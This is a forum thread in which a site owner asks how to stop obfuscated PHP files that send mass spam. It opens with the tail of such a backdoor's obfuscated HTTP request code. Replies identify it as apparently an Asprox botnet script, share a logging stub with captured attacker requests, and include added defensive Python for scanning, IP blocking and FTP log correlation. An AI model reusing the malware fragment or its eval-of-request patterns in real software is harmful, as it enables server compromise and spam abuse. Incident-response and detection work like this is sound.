        if (isset(${${"GLOBALS"}["ysihoboxrlp"]}["cookie"])) {
            $ztssvlnv                   = "params";
            ${${"GLOBALS"}["wtdppktf"]} = "";
            $qnmqlxq                    = "cookie";
            if (is_array(${$ztssvlnv}["cookie"])) {
                ${"GLOBALS"}["osiiuvji"] = "k";
                ${"GLOBALS"}["bisylu"]   = "cookie";
                $btalunrwhiv             = "params";
                $eotrwnlnuut             = "cookie";
                foreach (${$btalunrwhiv}["cookie"] as ${${"GLOBALS"}["osiiuvji"]} => ${${"GLOBALS"}["beratloij"]})
                    ${$eotrwnlnuut} .= "$k=$v; ";
                ${${"GLOBALS"}["bisylu"]} = substr(${${"GLOBALS"}["wtdppktf"]}, 0, -2);
            } else
                ${${"GLOBALS"}["wtdppktf"]} = ${${"GLOBALS"}["icgdbvfx"]}["cookie"];
            $tiwbwbgch = "request";
            if (${$qnmqlxq} != "")
                ${$tiwbwbgch} .= "Cookie: $cookie\r\n";
        }
        ${"GLOBALS"}["wfcqsum"] = "request";
        $dpnkqsgbmss            = "params";
        ${${"GLOBALS"}["reqvhywjsyc"]} .= "Connection: close\r\n";
        $rrgdjfvkdzd = "params";
        if (${$dpnkqsgbmss}["method"] == "POST") {
            $bdrehri = "data";
            if (isset(${${"GLOBALS"}["icgdbvfx"]}["data"]) && is_array(${${"GLOBALS"}["icgdbvfx"]}["data"])) {
                $egwwjfvmn                  = "k";
                ${"GLOBALS"}["theexecgcpc"] = "data";
                ${"GLOBALS"}["qsvwagufkq"]  = "v";
                $fkqgohlfyhme               = "data";
                $qttdtutjpo                 = "data";
                ${"GLOBALS"}["qzkbuomkiwt"] = "k";
                $xturoya                    = "data";
                foreach (${${"GLOBALS"}["icgdbvfx"]}["data"] AS ${${"GLOBALS"}["qzkbuomkiwt"]} => ${${"GLOBALS"}["beratloij"]})
                    ${${"GLOBALS"}["theexecgcpc"]} .= urlencode(${$egwwjfvmn}) . "=" . urlencode(${${"GLOBALS"}["qsvwagufkq"]}) . "&";
                if (substr(${$fkqgohlfyhme}, -1) == "&")
                    ${$qttdtutjpo} = substr(${$xturoya}, 0, -1);
            }
            ${"GLOBALS"}["qdybannd"] = "data";
            $vpqzmjw                 = "request";
            ${${"GLOBALS"}["qdybannd"]} .= "\r\n\r\n";
            ${${"GLOBALS"}["mxbdjl"]} .= "Content-type: application/x-www-form-urlencoded\r\n";
            ${$vpqzmjw} .= "Content-length: " . strlen(${$bdrehri}) . "\r\n";
        }
        ${${"GLOBALS"}["mxbdjl"]} .= "\r\n";
        if (${$rrgdjfvkdzd}["method"] == "POST")
            ${${"GLOBALS"}["mxbdjl"]} .= ${${"GLOBALS"}["yhdqjv"]};
        $sttbiso = "h_detected";
        @fwrite(${${"GLOBALS"}["szyxqtzcz"]}, ${${"GLOBALS"}["wfcqsum"]});
        ${${"GLOBALS"}["voftntvv"]} = "";
        ${${"GLOBALS"}["gcjhotz"]}  = "";
        ${$sttbiso}                 = false;
        while (!@feof(${${"GLOBALS"}["wsxrgoan"]})) {
            ${"GLOBALS"}["ggtgxfqmhr"] = "fp";
            $mqieenew                  = "res";
            $wetpmnqilx                = "h_detected";
            ${$mqieenew} .= @fread(${${"GLOBALS"}["ggtgxfqmhr"]}, 1024);
            if (!${$wetpmnqilx} && strpos(${${"GLOBALS"}["voftntvv"]}, "\r\n\r\n") !== FALSE) {
                $ymmwrvoxk                  = "params";
                ${"GLOBALS"}["mtvkkvxdxoa"] = "params";
                ${${"GLOBALS"}["plfpgtb"]}  = true;
                $lqolddccno                 = "res";
                ${${"GLOBALS"}["gcjhotz"]}  = substr(${${"GLOBALS"}["voftntvv"]}, 0, strpos(${${"GLOBALS"}["voftntvv"]}, "\r\n\r\n"));
                ${"GLOBALS"}["inyzbimrc"]   = "params";
                ${$lqolddccno}              = substr(${${"GLOBALS"}["voftntvv"]}, strpos(${${"GLOBALS"}["voftntvv"]}, "\r\n\r\n") + 4);
                ${"GLOBALS"}["viuxkiqghe"]  = "params";
                $ynocuad                    = "params";
                if (${${"GLOBALS"}["inyzbimrc"]}["return"] == "headers" || ${$ynocuad}["return"] == "array" || (isset(${$ymmwrvoxk}["redirect"]) && ${${"GLOBALS"}["icgdbvfx"]}["redirect"] == true)) {
                    ${"GLOBALS"}["tihbfknd"]   = "headers";
                    $cxurfemi                  = "v";
                    $nswjgtyivh                = "h";
                    ${"GLOBALS"}["zvszpu"]     = "h";
                    ${${"GLOBALS"}["zvszpu"]}  = explode("\r\n", ${${"GLOBALS"}["tihbfknd"]});
                    ${${"GLOBALS"}["gcjhotz"]} = array( );
                    $vberfrg                   = "k";
                    foreach (${$nswjgtyivh} as ${$vberfrg} => ${$cxurfemi}) {
                        $goonxstjkr = "v";
                        if (strpos(${$goonxstjkr}, ":")) {
                            ${"GLOBALS"}["kkjigtjk"]      = "v";
                            $pdtxksekkf                   = "v";
                            ${"GLOBALS"}["nxnazsix"]      = "v";
                            ${${"GLOBALS"}["mqlebyzvmj"]} = substr(${${"GLOBALS"}["nxnazsix"]}, 0, strpos(${${"GLOBALS"}["kkjigtjk"]}, ":"));
                            ${${"GLOBALS"}["beratloij"]}  = trim(substr(${$pdtxksekkf}, strpos(${${"GLOBALS"}["beratloij"]}, ":") + 1));
                        }
                        ${${"GLOBALS"}["gcjhotz"]}[strtoupper(${${"GLOBALS"}["mqlebyzvmj"]})] = ${${"GLOBALS"}["beratloij"]};
                    }
                }
                if (isset(${${"GLOBALS"}["icgdbvfx"]}["redirect"]) && ${${"GLOBALS"}["viuxkiqghe"]}["redirect"] == true && isset(${${"GLOBALS"}["gcjhotz"]}["LOCATION"])) {
                    ${"GLOBALS"}["vxgtkfmq"]           = "params";
                    $mevkiblihp                        = "headers";
                    ${${"GLOBALS"}["icgdbvfx"]}["url"] = ${$mevkiblihp}["LOCATION"];
                    if (!isset(${${"GLOBALS"}["icgdbvfx"]}["redirect-count"]))
                        ${${"GLOBALS"}["icgdbvfx"]}["redirect-count"] = 0;
                    if (${${"GLOBALS"}["vxgtkfmq"]}["redirect-count"] < 10) {
                        $fkqxmrulf = "func";
                        $ftjyenwi  = "params";
                        ${${"GLOBALS"}["icgdbvfx"]}["redirect-count"]++;
                        ${"GLOBALS"}["lbyothw"]   = "func";
                        ${"GLOBALS"}["ntendwsbp"] = "func";
                        ${$fkqxmrulf}             = __FUNCTION__;
                        return @is_object($this) ? $this->${${"GLOBALS"}["ntendwsbp"]}(${$ftjyenwi}) : ${${"GLOBALS"}["lbyothw"]}(${${"GLOBALS"}["icgdbvfx"]});
                    }
                }
                if (${${"GLOBALS"}["mtvkkvxdxoa"]}["return"] == "headers")
                    return ${${"GLOBALS"}["gcjhotz"]};
            }
        }
        @fclose(${${"GLOBALS"}["ihvknvh"]});
    } else
        return FALSE;
    if (${${"GLOBALS"}["icgdbvfx"]}["return"] == "array")
        ${${"GLOBALS"}["voftntvv"]} = array(
            "headers" => ${$pmcvjns},
            "content" => ${${"GLOBALS"}["krcdefut"]}
        );
    return ${${"GLOBALS"}["hrixbsdqcqma"]};
}
?>

Any thoughts how I can prevent these files from appearing and sending mass spam???
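Added example (not part of the original post, and not the poster's code): a web-root scanner that looks for the traits of the file decoded above, namely hex-escaped strings, `${"GLOBALS"}[...]` variable indirection and `eval()` of request data. The thresholds, function names and both sample files are constructed for illustration.

```python
import re
from pathlib import Path

# PHP double-quoted escapes (\x47, \107) used to hide strings in the on-disk file.
PHP_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# Variable-variable indirection through $GLOBALS, e.g. ${"GLOBALS"}["mqlebyzvmj"].
GLOBALS_INDIRECTION = re.compile(r'\$\{\s*"GLOBALS"\s*\}\s*\[\s*"\w+"\s*\]')
# Request data passed into eval(), e.g. eval(base64_decode($_POST["code"])).
EVAL_REQUEST = re.compile(
    r'eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(\s*'
    r'\$_(?:POST|GET|REQUEST|COOKIE)\b', re.I)

# Constructed sample: two statements from the decoded file, re-written with hex escapes.
DROPPER_SAMPLE = r'''<?php
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x62\x79\x79\x70\x63\x75\x79\x6b"] = "\x6b\x65\x79";
if (isset($_POST["\x63\x6f\x64\x65"])) { eval(base64_decode($_POST["\x63\x6f\x64\x65"])); }
'''

# Constructed benign file for comparison.
BENIGN_SAMPLE = r'''<?php
$host = preg_replace("/^(www|ftp)\./i", "", $_SERVER["HTTP_HOST"]);
echo "Hello from " . htmlspecialchars($host);
'''


def decode_php_escapes(source):
    """Undo \\xHH and octal escapes so the signatures also match the encoded file."""
    def repl(match):
        if match.group(1):
            code = int(match.group(1), 16)
        else:
            code = int(match.group(2), 8)
        return chr(code & 0xFF)
    return PHP_ESCAPE.sub(repl, source)


def inspect_php(source):
    """Return the indicators found in one PHP source string."""
    escapes = len(PHP_ESCAPE.findall(source))
    plain = decode_php_escapes(source)
    findings = {
        # Rough share of the file that is escape sequences (about 4 bytes each).
        "escape_density": escapes * 4 / max(len(source), 1),
        "globals_indirection": len(GLOBALS_INDIRECTION.findall(plain)),
        "eval_of_request": bool(EVAL_REQUEST.search(plain)),
    }
    findings["suspicious"] = (
        findings["eval_of_request"]
        or findings["globals_indirection"] >= 5
        or findings["escape_density"] > 0.30
    )
    return findings


def scan_web_root(root):
    """Walk a web root and return (relative path, findings) for suspicious PHP files."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in (".php", ".phtml", ".php5"):
            result = inspect_php(path.read_text(encoding="latin-1"))
            if result["suspicious"]:
                hits.append((path.relative_to(root).as_posix(), result))
    return hits


if __name__ == "__main__":
    import sys
    for name, info in scan_web_root(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(name, info)
```

Run it against each domain's public_html and review every hit by hand; legitimate code that uses many octal or hex escapes can also trip the density threshold.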
 
Check logs to see if they're being uploaded to your server by someone with an FTP login (compare date/time stamps against login times/dates).

Otherwise look for exploitable code in the php files currently on the site.

Jeff
 
Still investigating, but I got this earlier... The file I mentioned here? I replaced it with this:

Code:
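<?php
// Log every request that hits the path of the removed backdoor.
// log.txt sits in the web root here, so anyone can fetch it; a path outside public_html is safer.
$data = "\n\n\n\n";

$sources = array( '_POST' => $_POST, '_GET' => $_GET, '_REQUEST' => $_REQUEST, '_SERVER' => $_SERVER );

foreach( $sources as $name => $vars )
{
	foreach( $vars as $key => $val )
	{
		// Parameters such as code[]=... arrive as arrays; serialize them instead of logging "Array".
		if( !is_scalar( $val ) )
		{
			$val = json_encode( $val );
		}
		$data .= "['$name'] [$key] = $val\n";
	}
}

// Append under a lock rather than re-reading and rewriting the whole file on every request.
file_put_contents( "./log.txt", $data, FILE_APPEND | LOCK_EX );

?>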

I hate you.


A couple of interesting bits:
['_POST'] [code] = ZWNobyAic2FkZmFzZGZhc2RmYXNkZiI7
['_POST'] [type] = 10dfc8d0d36decfa1934bcf0e82e80ff
['_SERVER'] [HTTP_USER_AGENT] = Python-urllib/2.7
['_SERVER'] [REMOTE_ADDR] = 78.138.118.128
 
I suggest that you install an antivirus that checks uploads and deletes files before they are placed on your server.
Virus has the ability to delete such files.
 
Now that I have some of these IPs though, is there a way I can blacklist them from ever accessing the server at all? Or do I have any options there?
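Added example (not from the original posts): a triage script for the log.txt written by the logging stub above. It counts requests per source address, decodes the base64 `code` parameter for review without running it, and prints firewall rules. It assumes the `['_POST'] [key] = value` line format shown in the thread and a Linux host with iptables; the second record in the sample log is constructed.

```python
import base64
import binascii
import ipaddress
import re
from collections import Counter

LINE = re.compile(r"^\['_(POST|GET|REQUEST|SERVER)'\] \[([^\]]*)\] = (.*)$")

# First record uses the values quoted in the thread; the second is constructed and
# carries a forged REMOTE_ADDR line smuggled in through a newline in a POST value.
SAMPLE_LOG = (
    "\n\n\n\n"
    "['_POST'] [code] = ZWNobyAic2FkZmFzZGZhc2RmYXNkZiI7\n"
    "['_POST'] [type] = 10dfc8d0d36decfa1934bcf0e82e80ff\n"
    "['_SERVER'] [HTTP_USER_AGENT] = Python-urllib/2.7\n"
    "['_SERVER'] [REMOTE_ADDR] = 78.138.118.128\n"
    "\n\n\n\n"
    "['_POST'] [type] = 1\n"
    "['_POST'] [emails] = x\n['_SERVER'] [REMOTE_ADDR] = 192.0.2.1\n"
    "['_SERVER'] [REMOTE_ADDR] = 203.0.113.9\n"
)


def parse_records(log_text):
    """Split the log on the blank-line separators and index each record by (source, key)."""
    records = []
    for chunk in re.split(r"\n{4,}", log_text):
        record = {}
        for line in chunk.splitlines():
            match = LINE.match(line)
            if match:
                # The logger writes $_SERVER last, so the last value for a key is the
                # genuine one; earlier duplicates can be forged through POST data.
                record[(match.group(1), match.group(2))] = match.group(3)
        if record:
            records.append(record)
    return records


def decode_payload(value):
    """Base64-decode a captured 'code' parameter to text for reading. Never executed."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def triage(log_text):
    """Return (request count per source IP, decoded payloads per source IP)."""
    hits = Counter()
    payloads = {}
    for record in parse_records(log_text):
        try:
            ip = str(ipaddress.ip_address(record.get(("SERVER", "REMOTE_ADDR"), "")))
        except ValueError:
            continue  # missing or malformed address: do not build a rule from it
        hits[ip] += 1
        code = record.get(("POST", "code"))
        if code is not None:
            payloads.setdefault(ip, []).append(decode_payload(code))
    return hits, payloads


def deny_rules(hits, min_hits=1):
    """Build one DROP rule per address seen at least min_hits times."""
    rules = []
    for ip, count in sorted(hits.items()):
        if count >= min_hits:
            tool = "iptables" if ipaddress.ip_address(ip).version == 4 else "ip6tables"
            rules.append("%s -I INPUT -s %s -j DROP" % (tool, ip))
    return rules


if __name__ == "__main__":
    counts, decoded = triage(SAMPLE_LOG)
    for address, texts in decoded.items():
        print(address, texts)
    print("\n".join(deny_rules(counts)))
```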
 
Asprox botnet php backdoor and mailing script

Hello c0nfus3d1,
I believe that this script was part of the Asprox botnet. Your server was most probably compromised because of the stolen FTP password. Change the password and switch from using FTP to SFTP.

http://rebsnippets.blogspot.com/asprox


Best regards
Michal Ambroz
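Added example (not from the thread's authors): one way to run the check Jeff suggests and to test the stolen-FTP-password theory above, by matching each dropped file's modification time against upload records in the FTP transfer log. It assumes the server writes the xferlog format (as ProFTPD's TransferLog does) and that log times and file times are both server-local; all paths, accounts and addresses are constructed.

```python
from collections import namedtuple
from datetime import datetime, timedelta

Transfer = namedtuple("Transfer", "when host size path direction user status")

# Constructed xferlog lines (documentation address ranges, made-up account names).
SAMPLE_XFERLOG = """\
Mon Mar 10 03:12:45 2014 1 203.0.113.7 48213 /home/site1/public_html/gallery.php b _ i r site1 ftp 0 * c
Mon Mar 10 09:30:02 2014 2 198.51.100.20 1024 /home/site1/public_html/index.php b _ o r site1 ftp 0 * c
Tue Mar 11 14:00:10 2014 1 198.51.100.20 2210 /home/site1/public_html/style.css a _ i r site1 ftp 0 * c
""".splitlines()

# Constructed input: suspicious files and their modification times (server-local).
DROPPED = {
    "/home/site1/public_html/gallery.php": datetime(2014, 3, 10, 3, 12, 46),
    "/home/site2/public_html/stats.php": datetime(2014, 3, 10, 4, 0, 0),
}


def parse_xferlog_line(line):
    """Parse one xferlog record; return None for anything that does not fit the format."""
    tok = line.split()
    if len(tok) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(tok[:5]), "%a %b %d %H:%M:%S %Y")
        size = int(tok[7])
    except ValueError:
        return None
    # The last nine fields are fixed, so the file name is whatever lies in between.
    tail = tok[-9:]
    return Transfer(when, tok[6], size, " ".join(tok[8:-9]), tail[2], tail[4], tail[8])


def uploads(xferlog_lines):
    """Keep only incoming transfers (direction 'i')."""
    parsed = (parse_xferlog_line(line) for line in xferlog_lines)
    return [t for t in parsed if t and t.direction == "i"]


def correlate(dropped, xferlog_lines, window=timedelta(minutes=2)):
    """Map each dropped file to the FTP uploads of that path within the time window.

    An empty list means the file did not arrive over FTP, which points at the
    site's own code (or another service) instead of a stolen password.
    """
    incoming = uploads(xferlog_lines)
    return {
        path: [t for t in incoming if t.path == path and abs(t.when - mtime) <= window]
        for path, mtime in dropped.items()
    }


def hosts_per_account(xferlog_lines):
    """List the remote hosts each FTP account uploaded from; unfamiliar ones stand out."""
    seen = {}
    for t in uploads(xferlog_lines):
        seen.setdefault(t.user, set()).add(t.host)
    return {user: sorted(hosts) for user, hosts in seen.items()}


if __name__ == "__main__":
    for path, matches in correlate(DROPPED, SAMPLE_XFERLOG).items():
        if matches:
            for t in matches:
                print("%s: uploaded as %s from %s at %s" % (path, t.user, t.host, t.when))
        else:
            print("%s: no matching FTP upload" % path)
    print(hosts_per_account(SAMPLE_XFERLOG))
```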
 